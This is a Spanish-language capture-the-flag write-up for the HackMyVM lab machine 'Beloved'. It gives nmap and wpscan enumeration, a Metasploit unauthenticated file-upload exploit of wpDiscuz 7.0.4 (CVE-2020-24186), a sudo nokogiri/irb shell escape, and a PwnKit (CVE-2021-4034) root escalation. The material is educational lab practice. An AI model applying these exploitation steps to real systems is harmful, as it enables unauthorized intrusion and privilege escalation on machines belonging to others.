cd ~/blog

~/writeups/hmv/081-beloved.md

081 - Beloved

easy Linux hmv 23-04-2024
wpDiscuz 7.0.4 Unauthenticated RCE (CVE-2020-24186)sudo nokogiri PrivescPwnKit pkexec (CVE-2021-4034)
hackmyvm.eu/machines/machine.php?vm=Beloved

~1 min de lectura


Enumeramos puertos:

 sudo nmap -p- -sS -n -Pn -oG 01-allPorts 192.168.1.22
 nmap -sCV -p22,80 -oN 02-targeted.txt 192.168.1.22
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-23 18:47 -04
Nmap scan report for 192.168.1.22
Host is up (0.00045s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 0c:3f:13:54:6e:6e:e6:56:d2:91:eb:ad:95:36:c6:8d (RSA)
|   256 9b:e6:8e:14:39:7a:17:a3:80:88:cd:77:2e:c3:3b:1a (ECDSA)
|_  256 85:5a:05:2a:4b:c0:b2:36:ea:8a:e2:8a:b2:ef:bc:df (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-title: Beloved – Just another WordPress site
|_http-generator: WordPress 5.7.2
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.18 seconds

El sitio redirige a http://beloved, que añadimos al /etc/hosts. Es WordPress, así que lo escaneamos con wpscan y encontramos el plugin wpDiscuz 7.0.4:

 wpscan --url http://beloved --plugins-detection aggressive -t 50
...
[+] wpdiscuz
 | Version: 7.0.4 (80% confidence)
...

Ese plugin es vulnerable a varios CVE (CVE-2020-24186); usamos el módulo de Metasploit para subida de archivos no autenticada:

 searchsploit wordpress discuz
Wordpress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload (Unauthenticated)           | php/webapps/49962.sh
WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution (Unauthenticated)           | php/webapps/49967.py
Wordpress Plugin wpDiscuz 7.0.4 - Unauthenticated Arbitrary File Upload (Metasploit | php/webapps/49401.rb
msf6 exploit(unix/webapp/wp_wpdiscuz_unauthenticated_file_upload) > run
...
meterpreter > shell
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Para escalar, revisamos sudo -l:

www-data@beloved:/home$ sudo -l
...
User www-data may run the following commands on beloved:
    (beloved) NOPASSWD: /usr/local/bin/nokogiri

nokogiri (la gema de parseo XML de Ruby) abre una sesión irb, desde la que ejecutamos una shell como beloved:

www-data@beloved:/home$ sudo -u beloved /usr/local/bin/nokogiri /etc/passwd
Your document is stored in @doc...
irb(main):001:0> exec "/bin/bash"
beloved@beloved:/home$

Obtenemos la primera flag. Buscamos binarios SUID y encontramos pkexec:

beloved@beloved:~$ find / -perm -4000 2>/dev/null
...
/usr/bin/pkexec
...

Explotamos PwnKit (CVE-2021-4034):

beloved@beloved:/tmp$ python3 CVE-2021-4034.py
Do you want to choose a custom payload? y/n (n use default payload)
[+] Cleaning pervious exploiting attempt (if exist)
[+] Creating shared library for exploit code.
[+] Finding a libc library to call execve
[+] Found a library at <CDLL 'libc.so.6', handle 7f25bf6454f0 at 0x7f25bef08b00>
[+] Call execve() with chosen payload
[+] Enjoy your root shell
# whoami
root

Obtenemos nuestra flag.

Fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados